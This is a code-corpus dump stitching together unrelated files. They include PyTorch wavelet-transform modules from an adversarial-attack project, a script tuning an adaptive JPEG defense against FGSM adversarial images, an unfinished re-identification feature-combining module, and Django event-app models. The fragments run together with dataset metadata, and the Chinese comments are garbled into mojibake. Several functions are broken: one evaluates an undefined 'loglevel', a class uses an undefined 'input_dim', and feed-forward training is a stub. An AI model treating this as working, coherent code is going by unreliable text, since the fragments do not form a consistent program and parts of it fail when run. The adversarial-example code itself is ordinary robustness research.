self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, input):
"""
input_lfc = \mathcal{L} * input * \mathcal{L}^T
#input_hfc_lh = \mathcal{H} * input * \mathcal{L}^T
#input_hfc_hl = \mathcal{L} * input * \mathcal{H}^T
#input_hfc_hh = \mathcal{H} * input * \mathcal{H}^T
:param input: the 2D data to be decomposed
:return: the low-frequency component of the input 2D data
"""
assert len(input.size()) == 4
self.input_height = input.size()[-2]
self.input_width = input.size()[-1]
self.get_matrix()
return DWTFunction_2D_tiny.apply(input, self.matrix_low_0, self.matrix_low_1, self.matrix_high_0,
self.matrix_high_1)
class IDWTFunction_2D_tiny(Function):
@staticmethod
def forward(ctx, input_LL, matrix_Low_0, matrix_Low_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1)
L = torch.matmul(input_LL, matrix_Low_1.t())
output = torch.matmul(matrix_Low_0.t(), L)
return output
@staticmethod
def backward(ctx, grad_output):
matrix_Low_0, matrix_Low_1 = ctx.saved_variables
grad_L = torch.matmul(matrix_Low_0, grad_output)
grad_LL = torch.matmul(grad_L, matrix_Low_1)
return grad_LL, None, None, None, None
class DWT_2D(Module):
"""
input: the 2D data to be decomposed -- (N, C, H, W)
output -- lfc: (N, C, H/2, W/2)
hfc_lh: (N, C, H/2, W/2)
hfc_hl: (N, C, H/2, W/2)
hfc_hh: (N, C, H/2, W/2)
"""
def __init__(self, wavename):
"""
2D discrete wavelet transform (DWT) for 2D image decomposition
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(DWT_2D, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.rec_lo
self.band_high = wavelet.rec_hi
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low)
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
def get_matrix(self):
"""
็ๆๅๆข็ฉ้ต
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width))
L = math.floor(L1 / 2)
matrix_h = np.zeros((L, L1 + self.band_length - 2))
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, input):
"""
input_lfc = \mathcal{L} * input * \mathcal{L}^T
input_hfc_lh = \mathcal{H} * input * \mathcal{L}^T
input_hfc_hl = \mathcal{L} * input * \mathcal{H}^T
input_hfc_hh = \mathcal{H} * input * \mathcal{H}^T
:param input: the 2D data to be decomposed
:return: the low-frequency and high-frequency components of the input 2D data
"""
assert len(input.size()) == 4
self.input_height = input.size()[-2]
self.input_width = input.size()[-1]
self.get_matrix()
return DWTFunction_2D.apply(input, self.matrix_low_0, self.matrix_low_1, self.matrix_high_0, self.matrix_high_1)
class IDWT_2D(Module):
"""
input: lfc -- (N, C, H/2, W/2)
hfc_lh -- (N, C, H/2, W/2)
hfc_hl -- (N, C, H/2, W/2)
hfc_hh -- (N, C, H/2, W/2)
output: the original 2D data -- (N, C, H, W)
"""
def __init__(self, wavename):
"""
2D inverse DWT (IDWT) for 2D image reconstruction
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(IDWT_2D, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.dec_lo
self.band_low.reverse()
self.band_high = wavelet.dec_hi
self.band_high.reverse()
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low)
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
def get_matrix(self):
"""
็ๆๅๆข็ฉ้ต
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width))
L = math.floor(L1 / 2)
matrix_h = np.zeros((L, L1 + self.band_length - 2))
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, LL, LH, HL, HH):
"""
recontructing the original 2D data
the original 2D data = \mathcal{L}^T * lfc * \mathcal{L}
+ \mathcal{H}^T * hfc_lh * \mathcal{L}
+ \mathcal{L}^T * hfc_hl * \mathcal{H}
+ \mathcal{H}^T * hfc_hh * \mathcal{H}
:param LL: the low-frequency component
:param LH: the high-frequency component, hfc_lh
:param HL: the high-frequency component, hfc_hl
:param HH: the high-frequency component, hfc_hh
:return: the original 2D data
"""
assert len(LL.size()) == len(LH.size()) == len(HL.size()) == len(HH.size()) == 4
self.input_height = LL.size()[-2] + HH.size()[-2]
self.input_width = LL.size()[-1] + HH.size()[-1]
self.get_matrix()
return IDWTFunction_2D.apply(LL, LH, HL, HH, self.matrix_low_0, self.matrix_low_1, self.matrix_high_0,
self.matrix_high_1)
class IDWTFunction_2D(Function):
@staticmethod
def forward(ctx, input_LL, input_LH, input_HL, input_HH,
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1)
# L = torch.add(torch.matmul(input_LL, matrix_Low_1.t()), torch.matmul(input_LH, matrix_High_1.t()))
L = torch.matmul(input_LH, matrix_High_1.t())
H = torch.add(torch.matmul(input_HL, matrix_Low_1.t()), torch.matmul(input_HH, matrix_High_1.t()))
output = torch.add(torch.matmul(matrix_Low_0.t(), L), torch.matmul(matrix_High_0.t(), H))
return output
@staticmethod
def backward(ctx, grad_output):
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1 = ctx.saved_variables
grad_L = torch.matmul(matrix_Low_0, grad_output)
grad_H = torch.matmul(matrix_High_0, grad_output)
grad_LL = torch.matmul(grad_L, matrix_Low_1)
grad_LH = torch.matmul(grad_L, matrix_High_1)
grad_HL = torch.matmul(grad_H, matrix_Low_1)
grad_HH = torch.matmul(grad_H, matrix_High_1)
return grad_LL, grad_LH, grad_HL, grad_HH, None, None, None, None
class DWTFunction_2D(Function):
@staticmethod
def forward(ctx, input, matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1)
L = torch.matmul(matrix_Low_0, input)
H = torch.matmul(matrix_High_0, input)
LL = torch.matmul(L, matrix_Low_1)
LH = torch.matmul(L, matrix_High_1)
HL = torch.matmul(H, matrix_Low_1)
HH = torch.matmul(H, matrix_High_1)
return LL, LH, HL, HH
@staticmethod
def backward(ctx, grad_LL, grad_LH, grad_HL, grad_HH):
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1 = ctx.saved_variables
# grad_L = torch.add(torch.matmul(grad_LL, matrix_Low_1.t()), torch.matmul(grad_LH, matrix_High_1.t()))
grad_L = torch.matmul(grad_LH, matrix_High_1.t())
grad_H = torch.add(torch.matmul(grad_HL, matrix_Low_1.t()), torch.matmul(grad_HH, matrix_High_1.t()))
grad_input = torch.add(torch.matmul(matrix_Low_0.t(), grad_L), torch.matmul(matrix_High_0.t(), grad_H))
return grad_input, None, None, None, None
```
#### File: SSAH-adversarial-attack-main/utils/auxiliary_utils.py
```python
from torchvision import datasets, transforms
import numpy as np
import random
import torch
import os
import logging
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
def normalize_fn(dataset):
if dataset == 'imagenet_val':
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
else:
normalize = transforms.Normalize(mean=[0.491, 0.482, 0.446], std=[0.202, 0.199, 0.201])
return normalize
def predict(model, inputs, opt):
with torch.no_grad():
outputs = model(normalize_fn(opt.dataset)(inputs))
pred = outputs.max(1, keepdim=False)[1]
return pred
def common(targets, pred):
common_id = np.where(targets.cpu() == pred.cpu())[0]
return common_id
def attack_success(targets, pred):
attack_id = np.where(targets.cpu() != pred.cpu())[0]
return attack_id
def load_cifar10(opt):
path = os.path.join(opt.dataset_root, 'cifar10/')
transform = transforms.Compose([transforms.ToTensor()])
dataset = datasets.CIFAR10(root=path,
train=False,
transform=transform,download=True)
dataloader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=opt.bs,
shuffle=True,
num_workers=opt.workers,
pin_memory=True)
return dataloader, len(dataset)
def load_cifar100(opt):
path = os.path.join(opt.dataset_root, 'cifar-100-python/')
transform = transforms.Compose([transforms.ToTensor()])
dataset = datasets.CIFAR100(root=path,
train=False,
transform=transform,download=True)
dataloader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=opt.bs,
shuffle=True,
num_workers=opt.workers,
pin_memory=True)
return dataloader, len(dataset)
def load_imagenet_val(opt):
path = os.path.join(opt.dataset_root, 'ILSVRC2012/val/')
transform = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor()])
dataset = datasets.ImageFolder(root=path,
transform=transform)
dataloader = torch.utils.data.DataLoader(dataset=dataset,
batch_size=opt.bs,
shuffle=True,
num_workers=opt.workers,
pin_memory=True
)
return dataloader, len(dataset)
def print_conf(opt):
"""Print and save options
It will print both current options and default values(if different).
It will save options into a text file / [checkpoints_dir] / opt.txt
"""
message = ''
message += '----------------- Options ---------------\n'
for k, v in sorted(vars(opt).items()):
comment = ''
# default = self.parser.get_default(k)
# if v != default:
# comment = '\t[default: %s]' % str(default)
message += '{:>25}: {:<30}{}\n'.format(str(k), str(v), comment)
message += '----------------- End -------------------'
return message
def set_logger(opt):
"""Set the logger to log info in terminal and file `log_path`.
In general, it is useful to have a logger so that every output to the terminal is saved
in a permanent file. Here we save it to `model_dir/train.log`.
Example:
```
logging.info("Starting training...")
```
Args:
log_path: (string) where to log
"""
if 'loglevel' in opt:
loglevel = eval('logging.'+loglevel)
else:
loglevel = logging.INFO
outname = 'attack.log'
outdir = opt.outdir
log_path = os.path.join(outdir,outname)
logger = logging.getLogger()
logger.setLevel(loglevel)
if not logger.handlers:
# Logging to a file
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
logger.addHandler(file_handler)
# Logging to console
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(stream_handler)
logging.info(print_conf(opt))
logging.info('writting logs to file {}'.format(log_path))
```
#### File: adaptive-jpeg-compression/remove_code/thresh_hyperopt.py
```python
import gc
from hyperopt import hp, fmin, rand, Trials
# from hyperopt.mongoexp import MongoTrials
# from tqdm import tqdm
from adaptivce_defense import Cal_channel_wise_qtable,Cal_channel_wise_qtable_mp
from art.attacks.evasion import FastGradientMethod
import numpy as np
import torch
from torch.optim import Adam
import os
import sys
import torch.nn as nn
import pickle
# import cv2
from torch.utils.data import DataLoader
from art.estimators.classification import PyTorchClassifier
from adaptivce_defense import adaptive_defender
import matplotlib.pyplot as plt
sys.path.append('../common_code')
import general as g
# import pickle
def get_acc_mp(model,mean,std,images,labels):
images=(images.transpose(0,2,3,1)-mean)/std
images=torch.from_numpy(images.transpose(0,3,1,2)).cuda()
with torch.no_grad():
predictions = model(images)
predictions = np.argmax(predictions.cpu().numpy(),axis=1)
cors = np.sum(predictions==labels)
return cors
def get_acc(fmodel,images,labels):
with torch.no_grad():
predictions = fmodel.predict(images)
predictions = np.argmax(predictions,axis=1)
cors = np.sum(predictions==labels)
return cors
def get_defended_attacked_acc_per_batch(model,mean,std,attack_eps,defenders,defender_names,imgs_in,labels_in):
cors=np.zeros((len(attack_eps)+1,len(defenders)+1))
for i in range(imgs_in.shape[0]):
images_att=imgs_in[i,...].copy()
labels=labels_in
for k in range(len(defenders)+1):
images_def = images_att.copy()
if k>0:
if 'ADAD-flip'==defender_names[k-1]:
images_def,_ = defenders[k-1](images_def.transpose(0,2,3,1).copy(),labels.copy(),None,0)
elif 'ADAD+eps-flip'==defender_names[k-1]:
images_def,_ = defenders[k-1](images_def.transpose(0,2,3,1).copy(),labels.copy(),attack_eps[i]*np.ones(images_def.shape[0]),0)
else:
images_def,_ = defenders[k-1](images_def.transpose(0,2,3,1).copy(),labels.copy())
images_def=images_def.transpose(0,3,1,2)
images_def_cp = images_def.copy()
cors[i,k] += get_acc_mp(model,mean,std,images_def_cp,labels)
del images_def,images_def_cp
cors=cors/imgs_in.shape[1]
return np.expand_dims(cors,axis=0)
def get_defended_attacked_acc_mp(fmodel,attack_eps,defenders,defender_names,imgs_in,labels_in,batch_size):
model=fmodel.model
mean=fmodel.preprocessing.mean
std=fmodel.preprocessing.std
# start pool
ctx = torch.multiprocessing.get_context("spawn")
pool = ctx.Pool(data_setting.device_num*2)
# start_idx=0
# end_idx=batch_size
# get_defended_attacked_acc_per_batch(model,mean,std,attack_eps,defenders,defender_names,imgs_in[:,start_idx:end_idx,...].copy(),labels_in[start_idx:end_idx])
batch_num=int(np.ceil(imgs_in.shape[1]/batch_size))
pool_list=[]
for j in range(batch_num):
start_idx=j*batch_size
end_idx=min((j+1)*batch_size,imgs_in.shape[1])
res=pool.apply_async(get_defended_attacked_acc_per_batch,
args=(model,mean,std,attack_eps,defenders,defender_names,imgs_in[:,start_idx:end_idx,...].copy(),labels_in[start_idx:end_idx]))
pool_list.append(res)
pool.close()
pool.join()
corss=[]
for i in pool_list:
cors = i.get()
corss.append(cors)
cors_np=np.vstack(corss).sum(axis=0)
# cors=cors_np/len(dataloader.dataset)
return cors_np
def get_defended_attacked_acc(fmodel,attack_eps,defenders,defender_names,imgs_in,labels_in,batch_size):
cors=np.zeros((imgs_in.shape[0],len(defenders)))
batch_num=int(np.ceil(imgs_in.shape[1]/batch_size))
for i in range(imgs_in.shape[0]):
for j in range(batch_num):
start_idx=j*batch_size
end_idx=min((j+1)*batch_size,imgs_in.shape[1])
images_att=imgs_in[i,start_idx:end_idx,...].copy()
labels=labels_in[start_idx:end_idx]
for k in range(len(defenders)):
images_def = images_att.copy()
images_def,_ = defenders[k](images_def.transpose(0,2,3,1).copy(),labels.copy(),attack_eps[i]*np.ones(images_def.shape[0]),0)
images_def=images_def.transpose(0,3,1,2)
images_def_cp=images_def.copy()
cors[i,k] += get_acc(fmodel,images_def_cp,labels)
cors=cors/imgs_in.shape[1]
return cors
def get_shapleys_batch_adv(attack, dataloader, num_samples):
dataiter = iter(dataloader)
images = []
images_adv = []
labels = []
num_samples_now = 0
for i in range(len(dataloader)):
# t.set_description("Get attacked samples {0:3d}".format(num_samples_now))
data, label = dataiter.next()
save_cln = data.detach().numpy()
save_adv = attack.generate(save_cln)
images.append(save_cln)
images_adv.append(save_adv)
labels.append(label)
num_samples_now=num_samples_now+save_cln.shape[0]
torch.cuda.empty_cache()
if num_samples_now>=num_samples:
break
if num_samples_now<num_samples:
try:
print('\n!!! not enough samples for eps %.1f\n'%attack.eps)
except:
print('\n!!! not enough samples \n')
images_np=None
images_adv_np=None
labels_np=None
if len(images)>0:
images_np=np.vstack(images)
if len(images_adv)>0:
images_adv_np=np.vstack(images_adv)
if len(labels)>0:
labels_np=np.hstack(labels)
return images_np,images_adv_np,labels_np
def cal_table(threshs,saved_dir,cln_imgs_in,adv_imgs_in,attack_eps):
table_dict=dict()
table_dict[0]=np.ones([8,8,3])
for i in range(adv_imgs_in.shape[0]):
clean_imgs_ct=cln_imgs_in.copy()
adv_imgs_ct=adv_imgs_in[i,...].copy()
clean_imgs=np.transpose(clean_imgs_ct,(0,2,3,1))*255
adv_imgs=np.transpose(adv_imgs_ct,(0,2,3,1))*255
clean_imgs_ycc=g.rgb_to_ycbcr(clean_imgs)
adv_imgs_ycc=g.rgb_to_ycbcr(adv_imgs)
np.set_printoptions(suppress=True)
a_qtable,_,_,_=Cal_channel_wise_qtable(clean_imgs_ycc, adv_imgs_ycc,threshs)
a_qtable=np.round(a_qtable)
table_dict[attack_eps[i]]=a_qtable
del clean_imgs,adv_imgs,clean_imgs_ycc,adv_imgs_ycc
gc.collect()
# print(table_dict[0.5])
pickle.dump(table_dict, open(os.path.join(saved_dir,'table_dict_'+str(attack_eps[0])+'.pkl'),'wb'))
# def cal_table_jpeg(threshs,saved_dir,cln_imgs_in,adv_imgs_in,attack_eps):
# table_dict=dict()
# table_dict[0]=np.ones([8,8,3])
# for i in range(adv_imgs_in.shape[0]):
# a_qtable=np.ones([8,8,3])
# a_qtable[:,:,0]=g.scale_table(g.table_y,threshs[i]*100)
# a_qtable[:,:,1]=g.scale_table(g.table_c,threshs[i]*100)
# a_qtable[:,:,2]=g.scale_table(g.table_c,threshs[i]*100)
# table_dict[attack_eps[i+1]]=a_qtable
# pickle.dump(table_dict, open(os.path.join(saved_dir,'table_dict.pkl'),'wb'))
def objective(args):
threshs=np.array((args[0],args[1],args[2]))
saved_dir=args[3]
# fmodel=args[4]
# model=args[5]
cln_imgs_in=args[4]
adv_imgs_in=args[5]
labels=args[6]
batch_size=args[7]
nb_classes=args[8]
input_size=args[9]
pred_batch_size=args[10]
attack_eps=[args[11]]
fmodel=args[12]
# print(threshs)
'''
่ฎก็ฎ้่กจ
'''
cal_table(threshs,saved_dir,cln_imgs_in,adv_imgs_in,attack_eps)
table_pkl=os.path.join(saved_dir,'table_dict_'+str(attack_eps[0])+'.pkl')
defender=adaptive_defender(table_pkl,None,nb_classes,input_size,pred_batch_size,None)
'''
่ฎก็ฎ้ฒๅพกๆๆ
'''
# ๆ ไธบๅๅงๆ ทๆฌ
imgs_in=adv_imgs_in
labels_in=labels
accs=get_defended_attacked_acc(fmodel,attack_eps,[defender.defend],['ADAD+eps-flip'],imgs_in,labels_in,batch_size)
metric=accs.mean(axis=0)[0]
output=-metric
# print(accs)#[:,1])
return output
def img_and_model_init(model_vanilla_type):
'''
ๅ ่ฝฝๆจกๅ
'''
dir_model = '../models/cifar_vanilla_'+model_vanilla_type+'.pth.tar'
model,dataset_name=g.select_model(model_vanilla_type, dir_model)
model.eval()
'''
ๅ ่ฝฝๅพๅ
'''
data_setting=g.dataset_setting(dataset_name)
dataset=g.load_dataset(dataset_name,data_setting.dataset_dir,'val',data_setting.hyperopt_img_val_num)
dataloader = DataLoader(dataset, batch_size=data_setting.pred_batch_size, drop_last=False, shuffle=False, num_workers=data_setting.workers, pin_memory=True)
optimizer=Adam
optimizer.state_dict
fmodel = PyTorchClassifier(model = model,nb_classes=data_setting.nb_classes,clip_values=(0,1),
input_shape=data_setting.input_shape,loss = nn.CrossEntropyLoss(),
preprocessing=(data_setting.mean, data_setting.std),
optimizer=optimizer)
return data_setting,dataloader,fmodel
def attack_init(fmodel,dataloader,data_setting):
'''
ๆปๅปๅๅงๅ
'''
attacks=[]
attack_names=[]
attack_name='FGSM_L2_IDP'
eps=[]#[0.1,0.5,1.0]
eps.append(0.1*data_setting.eps_L2[0])
for i in range(len(data_setting.eps_L2)):
# eps.append(data_setting.eps_L2[i]*0.9)
eps.append(data_setting.eps_L2[i]*1.0)
# eps.append(data_setting.eps_L2[i]*1.1)
# eps=[10.0,1.0,0.5,0.1]
for i in range(len(eps)):
# attacks.append(FastGradientMethod(estimator=fmodel,eps=eps[i],norm=2,eps_step=eps[i],batch_size=data_setting.pred_batch_size))
attack_names.append(attack_name+'_'+str(eps[i]))
attacker,_=g.select_attack(fmodel,attack_name,eps[i])
attacks.append(attacker)
adv_imgs_list=[]
for i in range(len(attacks)):
attacker=attacks[i]
clean_imgs,adv_imgs_tmp,labels=get_shapleys_batch_adv(attacker,dataloader,data_setting.hyperopt_img_num)
adv_imgs_list.append(np.expand_dims(adv_imgs_tmp,axis=0))
adv_imgs=np.vstack(adv_imgs_list)
del adv_imgs_tmp,adv_imgs_list
gc.collect()
return clean_imgs,adv_imgs,labels,eps
if __name__=='__main__':
'''
settings
'''
# ้
็ฝฎ่งฃ้ๅจๅๆฐ
if len(sys.argv)!=2:
print('Manual Mode !!!')
model_vanilla_type = 'vgg16_imagenet'
else:
print('Terminal Mode !!!')
model_vanilla_type = str(sys.argv[1])
# global fmodel,model#,attacker#,attacker_name,img_num,eps
# attacker_name='FGSM_L2_IDP'
# max_evals=4
# resolution=0.01
g.setup_seed(0)
saved_dir = '../saved_tests/img_attack/'+model_vanilla_type
if not os.path.exists(saved_dir):
os.makedirs(saved_dir)
'''
ๅๅงๅ
'''
data_setting,dataloader,fmodel=img_and_model_init(model_vanilla_type)
'''
็ๆๅพๅ
'''
clean_imgs,adv_imgs,labels,eps=attack_init(fmodel, dataloader, data_setting)
'''
่ถ
ๅๆฐไผๅ
'''
for idx_eps,eps_now in enumerate(eps):
print('Hyperopt thresh for {}'.format(eps_now))
trials=Trials()
space =[
# hp.choice('t0',[0.066]),hp.choice('t1',[0.003]),hp.choice('t2',[0.165]),
hp.quniform('t0',data_setting.hyperopt_thresh_lower,data_setting.hyperopt_thresh_upper,data_setting.hyperopt_resolution),
hp.quniform('t1',data_setting.hyperopt_thresh_lower,data_setting.hyperopt_thresh_upper,data_setting.hyperopt_resolution),
hp.quniform('t2',data_setting.hyperopt_thresh_lower,data_setting.hyperopt_thresh_upper,data_setting.hyperopt_resolution),#hp.choice('t0',[0.9]),hp.choice('t1',[0.01]),hp.choice('t2',[0.01])
hp.choice('saved_dir',[saved_dir]),
hp.choice('clean_imgs',[clean_imgs]),
hp.choice('adv_imgs_in',[np.expand_dims(adv_imgs[idx_eps,...],axis=0)]),
hp.choice('labels',[labels]),
hp.choice('batch_size',[data_setting.pred_batch_size]),
hp.choice('nb_classes',[data_setting.nb_classes]),
hp.choice('input_size',[data_setting.input_shape[-1]]),
hp.choice('pred_batch_size',[data_setting.pred_batch_size]),
hp.choice('attack_eps',[eps_now]),
hp.choice('fmodel',[fmodel])]
best=fmin(objective,space,algo=rand.suggest,max_evals=data_setting.hyperopt_max_evals,verbose=True, max_queue_len=1,trials=trials)
pickle.dump(trials,open(os.path.join(saved_dir,'hyperopt_trail_'+str(eps_now)+'.pkl'),"wb"))
trials=pickle.load(open(os.path.join(saved_dir,'hyperopt_trail_'+str(eps_now)+'.pkl'),"rb"))
print(best)
'''
ๅฏ่งๅ
'''
trials_list=[]
parameters=['t0','t1','t2']
cols = len(parameters)
f, axes = plt.subplots(nrows=1, ncols=cols, figsize=(20, 5))
cmap = plt.cm.jet
for i, val in enumerate(parameters):
xs = np.array([t['misc']['vals'][val] for t in trials.trials]).ravel()
ys = [-t['result']['loss'] for t in trials.trials]
trials_list.append(np.expand_dims(np.vstack((xs,ys)),axis=0))
axes[i].scatter(
xs,
ys,
s=20,
linewidth=0.01,
alpha=1,
c='black')#cmap(float(i) / len(parameters)))
axes[i].set_title(val)
axes[i].set_ylim([np.array(ys).min()-0.1, np.array(ys).max()+0.1])
plt.savefig(os.path.join(saved_dir,'hyperopt_trail_'+str(eps_now)+'.png'), bbox_inches='tight')
trials_np=np.vstack(trials_list)
np.save(os.path.join(saved_dir,'hyperopt_trail_np_'+str(eps_now)+'.npy'),trials_np)
print(trials.best_trial)
'''
ไฟๅญbest table
'''
cal_table([best['t0'],best['t1'],best['t2']],saved_dir,clean_imgs,np.expand_dims(adv_imgs[idx_eps,...],axis=0),[eps_now])
'''
ๅๅนถๆ็ป็ปๆ
'''
table_dict=dict()
table_dict[0]=np.ones([8,8,3])
for idx_eps,eps_now in enumerate(eps):
table_pkl=os.path.join(saved_dir,'table_dict_'+str(eps_now)+'.pkl')
tabel_dict_tmp=pickle.load(open(table_pkl,'rb'))
table_dict.update(tabel_dict_tmp)
pickle.dump(table_dict, open(os.path.join(saved_dir,'table_dict.pkl'),'wb'))
``` |
{
"source": "johnzhang1999/deep-mvb-reid",
"score": 3
} |
#### File: torchreid/utils/multi_image.py
```python
import numpy as np
import torch
from torch import nn
__all__ = ['CombineMultipleImages']
class CombineMultipleImages:
"""
Both returned gf and g_pids are numpy array of float32
"""
def __init__(self, method, embed_dim, input_count, trainloader, encoder):
self.encoder = encoder
self.trainloader = trainloader
if method == "none":
self.fn = Identity()
elif method == "mean":
self.fn = Mean()
elif method == "feed_forward":
self.fn = FeedForward(embed_dim, input_count)
elif method == "self_attention":
self.fn = SelfAttention(embed_dim, input_count)
def train(self):
self.fn.train(self.encoder, self.trainloader)
def __call__(self, gf, g_pids, g_camids):
return self.fn(gf, g_pids, g_camids)
class CombineFunction:
def train(self, encoder, dataloader):
pass
def __call__(self, gf, g_pids, g_camids):
raise NotImplementedError
class Identity(CombineFunction):
def __call__(self, gf, g_pids, g_camids):
return gf, g_pids
class Mean(CombineFunction):
def __call__(self, gf, g_pids, g_camids):
gf = gf.numpy()
unique_ids = set(g_pids)
new_g_pids = []
gf_by_id = np.empty((len(unique_ids), gf.shape[-1]))
for i, gid in enumerate(unique_ids):
gf_by_id[i] = np.mean(gf[np.asarray(g_pids) == gid], axis=0)
new_g_pids.append(gid)
gf = np.array(gf_by_id)
g_pids = np.array(new_g_pids)
return gf, g_pids
class FeedForward(CombineFunction): # TODO:
def __init__(self, embed_dim, input_count):
super().__init__()
self.model = FeedForwardNN(embed_dim, input_count)
def train(self, encoder, dataloader):
for data in dataloader:
imgs = data[0]
pids = data[1]
cam_ids = data[2]
# print(len(data))
# exit()
def __call__(self, gf, g_pids, g_camids):
result = self.model(gf, g_pids, g_camids)
# Some modification on result
return result
class SelfAttention(CombineFunction):
def __init__(self, embed_dim, input_count):
self.model = SelfAttentionNN(input_dim, output_dim, input_count)
def train(self, dataloader):
pass
def __call__(self, gf, g_pids, g_camids):
result = self.model(gf, g_pids, g_camids)
# Some modification on result
return result
class FeedForwardNN(nn.Module):
def __init__(self, embed_dim, input_count):
super().__init__()
self.fc1 = nn.Linear(embed_dim * input_count, embed_dim * input_count)
self.fc2 = nn.Linear(embed_dim * input_count, embed_dim)
def forward(self, x):
pass
class SelfAttentionNN(nn.Module):
def __init__(self, embed_dim, input_count):
super().__init__()
def forward(self, x):
pass
``` |
{
"source": "johnzhang1999/Pop",
"score": 2
} |
#### File: Pop/backend/models.py
```python
from django.db import models
import datetime
# Create your models here.
class User(models.Model):
name = models.CharField(max_length=32)
uid = models.CharField(max_length=36, primary_key=True)
pwdHash = models.BinaryField(max_length=32)
expoPushToken = models.CharField(max_length=64)
def __str__(self):
return self.name
class Event(models.Model):
name = models.CharField(max_length=32)
desc = models.CharField(max_length=256)
loc = models.CharField(max_length=64)
eid = models.CharField(max_length=36, primary_key=True)
confirmed = models.IntegerField(default=0)
confirmedMembers = models.ManyToManyField(User, related_name='group_confirmed_members')
initTime = models.DateTimeField(default=datetime.datetime.now)
